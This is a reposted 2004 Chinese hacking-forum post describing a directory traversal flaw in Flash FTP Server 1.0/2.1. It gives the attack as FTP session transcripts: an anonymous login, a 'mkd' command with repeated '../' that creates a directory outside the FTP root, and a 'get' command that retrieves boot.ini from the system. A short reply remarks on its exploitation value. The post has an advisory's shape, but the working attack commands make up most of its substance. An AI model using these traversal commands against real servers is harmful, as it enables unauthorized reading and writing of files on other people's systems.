|
 | 作者: Newmyth21 [newmyth21]
 论坛用户 |
登录 |
| 涉及程序: Flash FTP Server 1.0版/2.1版 描述: Flash FTP Server存在目录遍历缺陷 详细: Flash FTP Server是一款功能强大,易于使用,运行于所有Windows平台上的 FTP服务器程序。 Flash FTP Server程序中存在目录遍历缺陷,攻击者通过向目标服务器使用精心构造的包含“../”或“..\”特殊字符的URL请求,能触发该缺陷,并能允许攻击者在目标系统的FTP root目录以外读取和写入任意文件。 攻击方法: 在FTP root目录以外创建一个目录: 220 Flash FTP Server v2.1 ready... user anonymous 331 Password required for anonymous. pass 230 User anonymous logged in. pwd 257 "/C:/ftp_root/" is current directory. mkd /../../../../../../../owned 257 'C:\..\..\..\..\..\..\..\owned': directory created 搜索FTP root目录以外的文件: 220 Flash FTP Server v2.1 ready... user anonymous 331 Password required for anonymous. pass 230 User anonymous logged in. ftp> get /../../../../../../../../boot.ini (转载) |
| 地主 发表时间: 04-01-17 17:46 |
| 回复: Newmyth21 [newmyth21] 论坛用户 |
登录 |
相信有一定的利用价值吧! |
| B1层 发表时间: 04-01-17 17:46 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: FlashFTPServer存在目录遍历缺陷